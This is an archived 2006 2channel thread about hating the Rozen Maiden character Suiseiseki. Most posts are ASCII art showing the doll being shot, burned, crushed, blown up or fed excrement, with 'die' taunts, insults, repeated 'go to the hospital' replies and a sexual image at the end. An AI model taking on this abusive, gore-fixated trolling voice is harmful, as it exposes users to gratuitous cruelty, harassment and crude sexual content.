2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

翠星石を殺さなくては

1 :名無しちゃん…電波届いた?:2006/06/10(土) 07:09:20
平和を取り戻すため

2 :名無しちゃん…電波届いた?:2006/06/10(土) 07:26:13
このAA好き。
                                  .!,i;;.i  .,/'゙`,_   .,ノ
                        、....,,,,..,,_      !レ.;! .,/'゙`,_   .,ノ
                        \  .⌒\  |r.|!.,,iミ/ ._,,,./′
                          i  '^'''‐、..゙'hノ|i ,.|丿 ̄′
                             \  \|レ |//
                                \|/ ||//
                                \| l||/
                               く/;・;',二ヽ>:・
                               |l |;・;',.・ハ))
                               |l |・:‘々゚):・..
                               ノl⊂;',;介」⊃0匚lア
                             ‘ .゚;・。;・.|;i/≧;・:
                              ミく二:・。;二〉ミ 。;・
                                ∪〒∪
                                丶lv|| v|

3 :名無しちゃん…電波届いた?:2006/06/10(土) 08:18:22
       ___
イヤデスゥゥ!!´;;;γ'⌒゙ヽ、
タスケテデスゥゥ/     ヽ
.く/ '二二ヽ>  ◎   l ))
。(ノノイハ))|l|、。     /,...;               /ヽへ/l、
.从゚`Д´゚リ|l|。ヾ、__, /彡・.,             〆     >   
⊂;:;⊂・/;;':"γ'⌒;ヽ、`ミ゚;`'..            <レl从^^从`、
;:∵;:・:/,;;;;;;;'/     ヽ;'∵;.‘             <口 _ 口レu/  翠星石を「RozenMaiden」から追放する?
 (( i;;;;;;;;;;i  ◎  ゙i ;;;'                (l^Y ll)
    ヾ;;;;;;;,ヽ、   ノ  ;;               |._ハ_.|
     `ー--=ニ-ー'                   ゝ' ゝ'



       ___
     /;;;γ'⌒゙ヽ、
ブッ・・・・・!!! /     ヽ  ;::・;:
イヤ…デス….  ◎  l ))*;:∵;::
  ;:・;::*:.ヾ、     /;:%;:∵;:::;            /ヽへ/l、
  ;:∵;从゚'дヾ、__,/彡・;:*;::;:           〆     >
   ゚・/,;;;'γ'⌒;ヽ∞;::;:・;::;;;::'.         <レl从^^从`、
    /,;;;;;;;'/    ブチャブチャッ!!;;'∵;;‘      <口∀口レu/  「この世」との間違いですぅw
 (( i;;;;;;;;;;i  ◎  ゙i;8:・o;:∵;:;;;'          (l^Y ll)
    ヾ;;;;;;;,ヽ、   ノ                  |._ハ_.|
     `ー--=ニ-ー'                   ゝ' ゝ'

4 :名無しちゃん…電波届いた?:2006/06/10(土) 08:22:00
もうちょっとスレタイひねることができなかったん?

5 :名無しちゃん…電波届いた?:2006/06/10(土) 08:44:48
2ちゃんねる系ブログ閉鎖祭り
まとめフラッシュと戦況図

資料12(最新版) http://myon.blog.shinobi.jp/Entry/12/
資料13(補足版) http://myon.blog.shinobi.jp/Entry/13/

6 :名無しちゃん…電波届いた?:2006/06/10(土) 12:10:27
             ___
.          く/',二二ヽ>  スイセイセキニハ オトウサマガ
            |l |ノノイハ))  ツイテイルデスゥ!
           ノl_|リ゚ ヮ゚ノl|') キットソラモトベルハズデスゥ!
          ≦c(,_u_,ノ≧
 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ
T  |   l,_,,/\ ,,/l  |
,.-r '"l\,,j  /  |/  L,,,/
,,/|,/\,/ _,|\_,i_,,,/ /
_V\ ,,/\,|  ,,∧,,|_/



              , '⌒丶
             γ   丶丶
            从     、ヽヽ、
 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、     Ω∩
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ    ⊂'   ヽ ブーンデスゥー!
T  |   l,_,,/\ ,,/l  |     く/',二二ヽ>
,.-r '"l\,,j  /  |/  L,,,/      |l |ノノイハ))
,,/|,/\,/ _,|\_,i_,,,/ /      cノl_| ^ω^ノl|っ
_V\ ,,/\,|  ,,∧,,|_/



 _,,..-―'"⌒"~⌒"~ ゙゙̄"'''ョ、
゙~,,,....-=-‐√"゙゙T"~ ̄Y"゙=ミ
T  |   l,_,,/\ ,,/l  |
,.-r '"l\,,j  /  |/  L,,,/
,,/|,/\,/ _,|\_,i_,,,/ /
_V\ ,,/\,|  ,,∧,,|_/          \ グチャッ /

7 :名無しちゃん…電波届いた?:2006/06/10(土) 12:13:55
                                 ___   ♪
                                く/',二二ヽ>
                                |l |ノノイハ)) )) すこやかに〜のびやかにぃ〜
                            ((  |l |リ゚ ヮ゚ノl|
                                ノl⊂l_介」つ0匚lア ミミ
                               ≦ノ`ヽノヘ≧     ミミ
.                              ミく二二二〉ミ     ψ

8 :名無しちゃん…電波届いた?:2006/06/10(土) 12:15:18
                                OーO、
                               (wiw,、 `!
                                )  !  l
                               (wi|i,ツ .ノ
                                ヾ (
                                 /ーヽ
                                  ヾ../   ._,,,‐''^^'''''>
                        、....,,,,..,,_       !.;! .,/'゙`,_   .,ノ
                        \  .⌒\    | .|!.,,iミ/ ._,,,./′
                          i  '^'''‐、..゙'hノ,| l.|厂 . ̄′
                         .ヽ_    ゙メリ|||.|
                             ̄ ̄   |.lk|
                               く/;・;',二ヽ>:・
                               |l |;・;',.・ハ)) 緑のはっぱをキラキラ広ゲベッ!
                               |l |・:‘々゚):・..
                               ノl⊂;',;介」つ0匚lア
                             ‘ .゚;・。;・.|;i/≧;・:
                              ミく二:・。;二〉ミ 。;・

9 ::2006/06/11(日) 02:38:15
生き物をころしてはいけません。
翠星石も自分も
わかった?

10 :名無しちゃん…電波届いた?:2006/06/11(日) 09:14:32
翠星石は生き物じゃありませんw
.                                          ___
                                       く/',二二ヽ>
.                _                      |l |ノノイハ))
               ̄   ̄                     ノl_|;;)`Д(;:;)
        . '            ヽ                ≦⊂メ;;:: "つ≧
       /                                    ミ (" :;/:;ノ  ミ
      /                                /   し'"し'
           ,-( ヽ         i         / /
    /     ./メ、ヽ ヽ          |          / /
         //  ヽl  |        |        / /
       //    // /        !     /
      //⊂且∩// /            /
    // ( #`x / /
  //   γ    /         /
  .|/     ヘ    |      .'. ./ ,
         )   |      .∴ '.. 
         /     |     ' . ,・ ,  . '
         /  ヘ   |   / ' ,
        /  / |  |  /    _/  |l
       /  /   |  |        / ̄/
      /  /.  /  |       /  / 〃.,
     (  /   /  l            /
     し'   /__)

11 :名無しちゃん…電波届いた?:2006/06/12(月) 19:57:26
こいつ嫌い
でもローゼンのドル箱だから消えないだろうなぁ

12 :名無しちゃん…電波届いた?:2006/06/12(月) 20:29:41
アニメキャラにリアルで嫌悪してるキモオタ共乙。
現実見る目を養えニート

13 :名無しちゃん…電波届いた?:2006/06/12(月) 22:01:00
現実を見つめた上で嫌っているんじゃないの?

14 :名無しちゃん…電波届いた?:2006/06/13(火) 00:09:18
>>12
翠ヲタは巣に(・∀・)カエレ!!

15 :名無しちゃん…電波届いた?:2006/06/15(木) 15:21:48
     ____
   く/ '二二ヽ>
   l(ノノイハ))l  虐待なんてやめて
   l |、゚ ヮ゚ ノ| l  翠石星と遊ぶですぅ♪
   |⊂l_介」⊃| ローゼンメイデン一可愛い翠星石様を
   /ノ>、,.<ヽ\ 崇めるAA、文章を貼り付けるですよ、下等生物♪
.  ≦<_/ |. ヽ_ン≧
  ミ   ∪∪    ミ
.     ‖‖

     ε  З ピョンピョン


            ?   ____?
               く/ '二二ヽ>
  /            .l(ノノイハ))l ?ナンノオトデスカ?       \
/ ゴォォォォォォォ.      l |、゚ ヮ゚ ノ| l            ゴォォォォォォォ \
\             |⊂l_介」⊃|                   /
  \           ≦ノ>、,.<ヽ≧                 /
.              ミく二二二〉ミ

16 :名無しちゃん…電波届いた?:2006/06/15(木) 15:22:27
         \\
       ̄ ̄|    __|_ __|_ __|_ __|_ __|_ __|_
         |    /|   /|  /|   /|  /|  /|
       ̄ ̄
           キャッ ! タイヘンデスゥ !
              ____
−− | ̄ ̄|     く/ '二二ヽ>    | ̄ ̄| −−−
二二 |    |   Σ .l(ノノイハ))l.    |    | 二二二二
三二 |    |     l |、;゚Д゚ノ| l    |    | 二三三二
二二 |    |     |⊂l_介」つ|    |    | 二二二二
−− |__|     ≦ノ>、,.<ヽ≧    |__| −−−
            ミく二二二〉ミ


        \\
      ̄ ̄|    __|_ __|_ __|_ __|_ __|_ __|_
        |    /|   /|  /|   /|  /|  /|
      ̄ ̄
            ヒィィ ! タスケテデフゥ〜
              ____    
      −− | ̄ ̄|'二二ヽ| ̄ ̄| −−−
      二二 |    |.ノノイハ)|    | 二二二
      二二 |   |;)゚8゚( |   | 二三二
      二二 |. (( |⊃介⊂| )) .| 二二二
      −− |__|ノ>、,.<ヘ|__| −−−
             ミく二二二〉ミ

17 :名無しちゃん…電波届いた?:2006/06/15(木) 15:23:48
          __ | |
        /  / __
       /   /        / \Λ
          /    ̄ ̄ /    /\
          ./    _/        \
                 > ブヘェ
               ∴.';: 
       −− | ̄ ̄|く | ̄ ̄| −−
       二二 | : . : ;|3゚'|‥;:. | 二二
       二二 |  ∴|::.':| ‥.'.:;つ 二二
       二二 ⊂:.'':,' |:,:ミ|.': ,. | 二二
       −− | .;'::,:|':;:'|∴. ' | −−
            ̄ ̄ .':  ̄ ̄
                ∵ミ
         __ | |   /
       /  /    /|
      /   /    __|__ \Λ
         /       /     /\
         ./      /        .\
                   '二二ヽ  
                 .(ノ。ノイハ))
               l | .':. * 々゚ノ| l
           く:.': . ∴:.'  ´´´″
          __∴___      .,‥.';:>
      −− | :,,'・||∵.':,'| −−
      二二 |  ;':||‥,;':;| 二二
      二二 | ,‥||・.':.': | 二二
      二二 | :.'':,'||‥..:;| 二二
      −− | .;'::,:||∴::).| −−
        ミ.:.':  ̄ ̄.': ̄ ̄  /..'.:  ≧‥.': .:;つ
   ⊂:;:.': .,   ..' ∵ :ミ.:..':.': 
       ≦.:..':・.'  ∪    ‥.':.':⊃

18 :名無しちゃん…電波届いた?:2006/06/18(日) 02:15:23
むう・・・この自演を何とかしなくては・・・。

19 :名無しちゃん…電波届いた?:2006/06/18(日) 10:15:09
ID表示されないからって自演というわけじゃないだろw
翠星石を嫌っている奴等は前から結構いるぞ

20 :名無しちゃん…電波届いた?:2006/06/18(日) 11:41:33
        _ ._ ._ ._ ._ ._ ._
         || || || || || || ||   ;;       ,  ` 
::::::::::::::......  _||_||_||_||_||_||_||      `  ',  `    ..,,-''"''""""'"''"'"''"'''''''''"'"''"''"'"''"'"''"'"''"'"''"
::::::::::::: /`ー''i_i -{iニi}=lk \_\   '  、`   ,,;:'"':;, ,;;'   ,,,  ─_-__  -__  =_-     -__=_   -   -
:::::::::::::::`ー、_∧__  ,(//))===========,, ,;:   ,,;     ;.;                         
 ...... :::::::::::::(,;゚Д) > //_/(/))_____{..;:;  .;:;;    ;;;;   ─ ─ `Д´)     ─ ‐ ─_    __ =  
:::::::::::::::::::ヽ~(  ⊃¶[二[_X_]:]ii= ̄ ̄ ̄ ̄{..;:;  .;:;;    ;;;;       ↑クソ翠       _ __  _ __ __ _ _
:::::::::::::::::::::::\ヽ" ヾ il_l___==`==========='' .;;,  '::''.   ;.;.     ─ - ─           
....::::::::::::::::::::::::: ̄{[{ニ!}^_ .{(/))[     ' ,,  "  ":;.,,;:'' 'i、  ''' _   -- _  __ _   __  __       _ __
...:::::::::::::::::___ヽ> /:(`〕=ii____  、 , ' , , ^'   '-;;,,...,,,.,.,..,,,,.,.,.........,.,,.,..,.,,...,...,,.,,.,..,.......,,...........
::::::::::::::::::[i_i__i_i__i__i__i__i_i] "  ,' " 、

21 :名無しちゃん…電波届いた?:2006/06/18(日) 14:05:11
>>1
病院行こうね

22 :名無しちゃん…電波届いた?:2006/06/18(日) 14:54:54
>>21
必死の反対運動テラムナシスw

23 :名無しちゃん…電波届いた?:2006/06/18(日) 21:14:19
@虐待厨が雑談スレを集中攻撃

Aスルーを知らない名無しやコテが荒らしを煽る

B虐待厨ファビョーン

以下、@ABを繰り返し


24 :名無しちゃん…電波届いた?:2006/06/18(日) 22:08:39
>>22
病院に行こうね

25 :名無しちゃん…電波届いた?:2006/06/18(日) 22:17:21
>>24
必死の抵抗運動テラムナシスw
            _
             ,'´r==ミ、  /ー- 、
       ,_ _ _   卯,iリノ)))〉 /==ヽ i
     /   `."-|l〉l.゚ ー゚ノl)/     |/+ キラッ
    '"'⌒`~"'" ''|!/'i)卯iつゝ   ___
            ''y /x l/、 .く/',二二ヽ> 〜♪
           l†/し'/†|.  l(ノノイハ))l
        三  lノ  / .レ   l |、゚ ヮ ゚ノ| l
                  |⊂l_介」⊃|

                    ?      ヒュンッ
                   ___ .//
          _―==く/',二二//ヽ>二二二三三
    ‐−―一二二二.三三l(ノノイ//ハ))l二三三三二
             ̄―=l |、*゚//々゚ノ| l二二三三三
                 |⊂l//_介」⊃|

26 :名無しちゃん…電波届いた?:2006/06/18(日) 22:43:13
>>25
病院に行こうね

27 :名無しちゃん…電波届いた?:2006/06/18(日) 23:07:41
>>26
一人きりの運動テラムナシスw

ゴキブリ並にしぶといわね   .,__    ., \
くたばりなさい害虫     ‐-;-.,_ "''=;- .,_\ \\.       ___
               .ィ/~~~' 、 ‐-> "`"'-' \    く/',二二ヽ>
             、_/ /  ̄`ヽ}二)  \     ヽ  ,、`;:,";:,`,・
             ,》@ i(从_从))-           ヽ,,;:`;:";+,;:"`";:,`;";:,;・
              ||ヽ||#゚ -゚ノ|||,,:::::='''''""""´ ̄ ))  i;・;:`,;:"";:+,;`;:*,;:
              || 〈iミ''介ミir'''''"""´´´ ̄ ̄    !r`"・;:`,;;・*つ
             ≦ノ,ノハヽ、≧ヾ./_     _   //ノ`ヽノヘ≧
.              テ ` -tッァ-'テ ー`、-、ヾ、、,  、, /i/⊂ 、二二〉ミ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」// ./// /    し'
―-/::::::::::::::::::::::::::::::::::::::::ヽ―――┬┘/ / / /

28 :名無しちゃん…電波届いた?:2006/06/19(月) 15:47:05
>>27
病院に行こうね

29 :名無しちゃん…電波届いた?:2006/06/19(月) 17:15:38
>>28
自分だけの正義テラムナシスw
         ___
       く/',二二ヽ>
       ゚。|l |ノノイハ))゚。 痛いっ!やめやがれですぅ・・・
.       。|l |リTДTノ| ゚
       ノl⊂l_介」つ
       ≦ノ`ヽノヘ≧
      {{ミく二二二〉ミ}}
   ̄ ̄ ̄ {{ し" ̄ ̄ ̄/\
         8    /    \
         8   /       \
   ∩且つ ,●/          \
  (   `x´)´●|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||
  (  つつ8 凄く面白いじゃんw ||
   ) ) )● ||          ||
  (_)_)   ||              ||

     |l|     |ll|
       ___
     く/',二二ヽ>
      |l |ノノイハ))
      |l |リ゚'々゚'ノ|
   ̄ ̄ノl⊂l_ξ,';. ̄/\
     ≦ノ` ;;  /    \   ズダンッ!!
    ミく二ζ;:/       \
   ∩且つ 8/          \
  (   `x´)8|| ̄ ̄ ̄ ̄ ̄ ̄ ̄||
  (    )●,  …プッ、キモッ||
   |   |  | ,●´          ||
  (__)_)`●          ||
      //W\

30 :名無しちゃん…電波届いた?:2006/06/19(月) 19:00:08
>>21
板見ようね

31 :名無しちゃん…電波届いた?:2006/06/19(月) 19:48:27
チンコしごこうね

32 :名無しちゃん…電波届いた?:2006/06/19(月) 20:05:36
お、粘着が来たか。
過疎って落ちるよりはマシだからどんどん保守してくれ。

33 :名無しちゃん…電波届いた?:2006/06/19(月) 21:52:34
  ,'~~~え             _
  {/´ ̄ヽヽ          .,',i><iヽ
 ((从_从)i@《,.        /((ノノリノ))
 ||从゚- ゚ ||/||.        ((ミi!゚ ヮ゚ノミ))
 ||⊂   ミヽ|. ぶり       /,   つ
. ≦( 、_,)_)  ぶり    (_(_, )
 て  J'J て ぶり     ● しし'
  ̄ ̄ ̄|: :     ぶり  : :  | ̄ ̄ ̄ ̄ ̄
 / ̄ ̄●.............................. ● ...... ̄ ̄ ̄\
 |:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
 |:::::::::::::::::::::::::::::::::___ブーン 〜∞::::::::::::::::::|
 |:::::::::::∞〜::::く/',二二ヽ>::: : : ::::::::::::::::::::::::|
 |::::::::::::::::::::::::::::|l |ノノイハ))::::●:::::::::::::::::::::::::|
 |::::::::::::: : : ::::::::|l |リ^〜゚ノ|んめぇーですぅ:::|
 |::::::::::::::●:::::●⊂l_介」つ●:::::::::::::::::::::::::::::|
 |::::::::::::::::::::::::::≦ノ`ヽノヘ≧::::::::::::::::::::::::::::::::|
 |:::::::●●::::::::ミく二二二〉ミ::::●:::::::::::::::::●|

34 :名無しちゃん…電波届いた?:2006/06/19(月) 22:29:00
>>29
病院に行こうね

35 :名無しちゃん…電波届いた?:2006/06/19(月) 22:29:32
>>33
病院に行こうね

36 :名無しちゃん…電波届いた?:2006/06/19(月) 22:51:54
翠星石死ね

37 :名無しちゃん…電波届いた?:2006/06/19(月) 23:19:38
>>34
>>35
翠厨テラムナシスw

38 :名無しちゃん…電波届いた?:2006/06/19(月) 23:21:20
            ┌──┐  
             i二ニニ二i
            i´ノノノヽ)))
             Wリ゚ ー゚ノリ
              ()_介」つ                                ですぅ!!
           __,,ゝ┼─┼====┐.        ''"´"'''::;:,,,          Ω ;: ;  Ω
           | □|   .| |:|ヾ二二二二二(O″     ,,;;;;´."'''     Ω ・,' ;*;∵; ζ。;:,.
      _____|__,|_;||___,| |:|ノ-┬─┘     ´''::;;;;::'''"´         ∵~'ハ∴∵;:;
     |ミ///   /   ~~|ミ|丘百~((==___    バゴーン          |l#ξρ。;,;。∵
    .└┼-┴─┴───┴──┐~~'''''-ゝ-┤              '.:; *,,,,: ;・∵:;゚
     ((◎)~~~O~~~~~O~~(◎))三)──)三);                ノl⊂l_介」つ
      ..ゝ(◎)(◎)(◎)(◎) (◎)ノ三ノ――ノ三ノ;*;∵              ≦ノ`ヽノヘ≧
                                              ミく二二二〉ミ


39 :名無しちゃん…電波届いた?:2006/06/19(月) 23:33:27
>>38
病院に行こうね

40 :名無しちゃん…電波届いた?:2006/06/20(火) 00:03:22
>>39
こんな粘着に好かれた翠星石はテラジャンクw

41 :名無しちゃん…電波届いた?:2006/06/20(火) 00:06:07
どうやら信者には刺激が強すぎるようでw
                                        ___   ♪
                                      く/',二二ヽ>
  _∩且つ______ : . ヒューーーン             |l |ノノイハ)) ))
  (_( ・x・)_(      (():∴ .              ((  |l |リ゚ ヮ゚ノl|
    (_ Υσ/ ̄ ̄ ̄ ̄ ̄ : .                  ノl⊂l_介」つ0匚lア ミミ
     |___|__|                              ≦ノ`ヽノヘ≧     ミミ
     l                              ミく二二二〉ミ     ψ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
                        /
                   / /_
                  /  /
                     /   \__________________________
      死ね        |
  _∩且つ______|
  (_( ・x・)_(      ((|
    (_ Υσ/ ̄ ̄ ̄ ̄ ̄ |      __________________________
     |___|__|          |    /                  ,;,;:.:,;:;:';';'''
     l        |\|\ \   >               ミく二二二〉ミ     ψ
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄

42 :名無しちゃん…電波届いた?:2006/06/20(火) 00:07:33
>>41
病院に行こうね

43 :名無しちゃん…電波届いた?:2006/06/20(火) 00:07:36
         , '´ ̄`ヽ
         i ノ '\@
         ,9、゚ ヮ゚ノ 
        /   つ
        (_(__⌒)  |^lヽ、
       ┌―(_)─┘.| )
         ゙ミ;;;;;,_    
        ミ;;;;;;;;、;:..,,.,,,,,
       i;i;i;i; '',',;^′..ヽ
       ゙ゞy、、;:..、)  }
        .¨.、,_,,、_,,r_,ノ′
     /;:;":;.:;";i; '',',;;;_~;;;′.ヽ
    ゙{y、、;:...:,:.:.、;:..:,:.:. ._  、}
    ".¨ー=v ''‐ .:v、,,、_,r_,ノ′
   /;i;i; '',',;;;_~⌒¨;;;;;;;;ヾ.ミ゙´゙^′..ヽ
   ゙{y、、;:...:,:.:.、;、;:.:,:.:. ._  .、)  、}
   ".¨ー=v ''‐ .:v、冫_._ .、,_,,、_,,r_,ノ′
  /i;i; '',',;;;_~υ⌒¨;;;;;;;;ヾ.ミ゙´゙^′.ソ.ヽ
  ゙{y、、;:..ゞ.:,:.:.、;:.ミ.:,:.:. ._υ゚o,,'.、)  、}
  ヾ,,..;::;;;::,;,::;):;:;:; .:v、冫_._ .、,_,,、_,,r_,ノ
         |l |ノノイハ))
          |l |;´Д`ノ| うまそうですぅ・・・
         ノl∩l_介」∩
        ≦ノ`ヽノヘ≧
.       ミく二二二〉ミ

44 :名無しちゃん…電波届いた?:2006/06/20(火) 00:08:19
                                   .____
                                  /__/|
                                 く/'二二ヽ>
                                _|l |ノ_ノイハ))___
         ______             ./  ノl_|#:;)Д(;:#)  /|
    ♪      \|       (____       | ̄ ⊂=====⊃ ̄ ̄| |
      .ィ/~~~' 、.|\            ` ヽ、    |___=====' ____|/        @⌒丶〜丶
   、_/ /  ̄`ヽ}.|  \       ♪     \      ∪ ∪| |            | ||||||| r==ミヽ
   ,》@ i(从_从))|  ♪\                〉      |   | |               .| |||||〈(((ノリi卯   _ _ _
   ||ヽ||.゚ ヮ゚ノ|.|||     \              /       |   | |            | ||||||从゚ー ゚,l〈l| /    ヽ
   || 〈iつ介ミi| ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ノ        |   | |            | |||||⊂二(i'ヽ!|ゝ '''"ー"``
   ≦ (ノノ匚____..┌- 、,. -┐♪ー―rー´               ┌──∬    | |||/ //l xヽy''     ♪
   テ〓〓UU.||    く|_,.ヘ_|〉 /⌒⌒ヽ   ♪ χ~ ̄~∬χ ♪ i二ニニ .|⊂ヽ | |/ / |†レしl,†l
    || ||   . || ♪ ノ イ从|从)、.//ゞ\※ /   <(((从从|⊂ヽ.  .(((/从ノ‖ヘ/  |  / レ   |ノ  ♪
    || ||.  ◎    |ミ|ミ!^ _ ゚ノミ!|. §!-ヮ-ノ≠)n=ョ ノ|,l!゚-$/‖ヘ./   从゚-( ‖ ).   ̄
             =∪=∩=}]) ' .ミ(_)二つ,,ノ    ノ(lつ━╋━━   (lつ━╋━━   ♪
                /__ハ_|   ./(__ハ_)  ♪  ( /,.ノ( .∬ )    〈__( . ∬ .)
                `もテ      `しテ′    ζ `~U. ⌒†⌒ ♪   〈_/. ⌒†⌒

45 :名無しちゃん…電波届いた?:2006/06/20(火) 00:08:20
>>43
病院に行こうね

46 :名無しちゃん…電波届いた?:2006/06/20(火) 00:08:50
>>44
病院に行こうね

47 :名無しちゃん…電波届いた?:2006/06/20(火) 00:08:52
   /             ドッカン  ドッカン
  / /    ,,_                    ドッカン
 ━━━━━'), )=         ☆ゴガギーン
      ∧_∧ヽ\         /                               / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     (   ) 〉 〉                                 ∧_∧ ∠ ジャンクのくせに車とかってw
     / ⌒ ̄ /    _,,,...... . .,,,,__,,---、___ .....,,,,_                (`∀´ )  \___________
     |   | ̄    y"'''"'ヽr"、、_/「 rく/'二二ヽ>`;、翠星石の新車がぁ…/     \
 .    |    |     /    ;!♯ ♯ '!:〈,. |l |ノノイハ)) .':;,,,、            | |   /\ヽ
       |   |     /ゞ,_,,,,♯,;!.♯.....〃i.,i 〉|l |リTДTノ|.、、 ,,,)}...,,,_        へ//|  |  | |
      (   |  . ,,}     /-     ゙゙:,'''''''''''''''''''''',,._ '''"'   `,;r,l''ヽ/,へ \|_  |   | |
       | .lヽ \ {,,r=ミ,   i "'''"'‐、   :, !_,.:'´ (メ::)r;:=====i、.\/  \_ / ( )
      | .|  〉 .〉;!,r=、i:r` :       ,:'"三ミ:、    ,',' +:;:;:;:;:;:;:;(::):|       | |
     / / / / Y!  |ゞ,;;;..;,,,,,,_,.:'´'''"__,!:;;r'~`;,:ゞr---ゞ_ニ=======)      | |
     / / / /  iヾノ:;;リ  ̄~~~`'''''―' :;|  リ;;;;;!二二..,,,,,,,,:,---',,;:;:;!        | |
    / /  / /    `'''''"          ヾニ":::/        `''''''''"         | |

48 :名無しちゃん…電波届いた?:2006/06/20(火) 00:09:20
>>47
病院に行こうね

49 :名無しちゃん…電波届いた?:2006/06/20(火) 00:09:28
翠星石は悪行をしても謝らない。
まさに性悪なので、その精神を叩き直すために体罰を与える。
これは当然のことだ。

┏━━━━━━┳━━━━━━━━━━━━━━┓
┃  料理する .┃翠星石か゛ あらわれた。      ┃
┃  殺す    ┃と゛ うする?▲            ┃
┃  虐待する .┃                    .┃
┃⇒ 燃やす   ┃                     ┃
┗━━━━━━┻━━━━━━━━━━━━━━┛

              ___
             く/',二二ヽ>
             |l |ノノイハ))
              |l |リ゚ ー゚ノl|
             ノl_|(l_介」).|
            ≦ノ`ヽノヘ≧
.           ミく二二二〉ミ


           ξ ___ξ
           く/',二二ヽ> ξ
.          ξ |l |ノノイハ))   ξ
.            |l#:;)*Д*#) 熱い、熱いですぅ〜!
         ξ ((ノl⊂l_介」つ)) ξ
           ≦ノ`ヽノヘ≧ξ    
          ξミく二二二〉ミ

50 :名無しちゃん…電波届いた?:2006/06/20(火) 00:09:51
>>49
病院に行こうね

51 :名無しちゃん…電波届いた?:2006/06/20(火) 00:11:19
>>50
コイツ必死杉w

52 :名無しちゃん…電波届いた?:2006/06/20(火) 00:11:51
           ガッ!!  ___
.            ,−く/'二二ヽ>
           ’;┼l||l |ノノイハ))’;. ゴメンナサイデスゥ
            l|l l|l∴ |リ#)。々)
            | l | |’,;l_|‘``”l_|ヽ
.           |, l┼≦      ≧
           | |  |.l|l       ミ
          ,i | l|i '; ・`
         _|  | i | *;.
       '´  `ヽ, l|
   _ _ _  I     #I |┼_ _ _
./    `\|l ||   ||l|/    ヽ,..,.,.よくもやってくれたわねぇ、クソミドリィ!!
'"'⌒`~"'" ''|从从从|ゝ '''"ー"``介」つ
       / /_ヽヽ    ノ`ヽノヘ
.      〈,r'OOヘ,〉    く二二二〉

53 :名無しちゃん…電波届いた?:2006/06/20(火) 00:12:08
>>52
病院に行こうね

54 :名無しちゃん…電波届いた?:2006/06/20(火) 00:12:29
        ___
      く/',二二ヽ>
       |l |ノノイハ))  虐待なんてできるもんなら
       |l |#゚听ノl|      してみやがれですぅ♪
      ノl⊂l_介」つ ローゼンメイデン一可愛い翠星石を
.      /ノ>、,.<ヽ\ 虐待するAAや文章をつくることなんか
.      `<_/ |. ヽ_ン'  チビ、デブ、ハゲ、バカな人間にはできっこないはずです♪
        ∪∪
        ‖‖
       ε  З ドカドカ


           ボンッ!
      Ω ;: ;  Ω
    Ω ・,' ;*;∵; ζ。;:,.
     ∵~'ハ∴∵;:;
       |l |#ξρ。;,;。∵
      '.:; *,,,,: ;・∵:;゚
      ノl⊂l_介」つ "〆
.      /ノ>、,.<ヽ\
.      `<_/ |. ヽ_ン'
        ∪∪
        ‖‖
       ε  З

55 :名無しちゃん…電波届いた?:2006/06/20(火) 00:12:39
>>54
病院に行こうね


56 :名無しちゃん…電波届いた?:2006/06/20(火) 00:13:07
     ___
   く/',二二ヽ>
    |l |ノ。ノイハ))
   ノl_|(* 々゚ノ|
  ≦ / っっl ≧
  ミ しー‐J  ミ

     ___
  く/',二二ヽ>
   |l |ノ。ノイハ))
 ヽノl_|(* 々゚ノ| ノ
  (( ノ ( 介 )ヽ ))
  ミ  <   > ミ

 ┌──┐
 i二ニニ二i     ___
 i´ノノノヽ)))  く/',二二ヽ>
  Wリ゚ ー゚ノリ   |l |ノ。ノイハ))
  ⊂)_介」つ8三ノl_|(* ノ三三三7
   〈__|__〉    ≦ / っっl ≧
   〈_ハ_〉    ミ しー‐J  ミ

57 :名無しちゃん…電波届いた?:2006/06/20(火) 00:13:31
>>56
病院に行こうね

58 :名無しちゃん…電波届いた?:2006/06/20(火) 00:14:15
          ___
   ___   く/',二二ヽ>  カサカサ
.く/',二二ヽ> |l |ノ。ノイハ))
. |l |ノ。ノイハ)).ノl_|(* 々゚ノ| <ですぅ…
.ノl_|(* 々゚ノ| ミ<<     >>ミ ___
ミ<<   >>ミ       く/',二二ヽ>
 カサカサ          .|l |ノ。ノイハ))  カサカサ
              ノl_|(* 々゚ノ| <ですぅ…
             ミ< <   >>ミ

          ___
        く/',二二ヽ>
.        |l |ノ。ノイハ))
        ノl_|(* 々゚ノ| ですぅ…
        ≦((癶^^/癶≧
        ミ ((癶^^/癶  ミ          λ  λ
        ‐((癶^^/癶                 ハ  ハ
   /⌒((‐((癶^^(癶))⌒))⌒))\       )〉 / )
 ≦(⌒((≧‐((癶^^\癶^^≧-≧))\    ノ レ ノ
≦‐((⌒\≧ ‐((癶^^\癶 ≦^^≧))⌒))⌒))_ノ
  ≦‐((⌒\___(癶(^^^^)癶     ≦^^^≧^^≧
    ≦‐(‐((‐((‐((癶^^)癶
     ≦^≦^≦^≦^^^≧

59 :名無しちゃん…電波届いた?:2006/06/20(火) 00:14:43
>>58
病院に行こうね

60 :名無しちゃん…電波届いた?:2006/06/20(火) 00:14:48
.   ____    ___
   | |・∀・| く/',二二ヽ>
   | |\  |` |l |ノ。ノイハ)) カク
.  (( |_|_ィ⌒ ノl_|(* 々゚ノ| <おまんまん気持ちいいですぅ〜♪
    ノ と、入ミ_,つ介λうミ
  カク

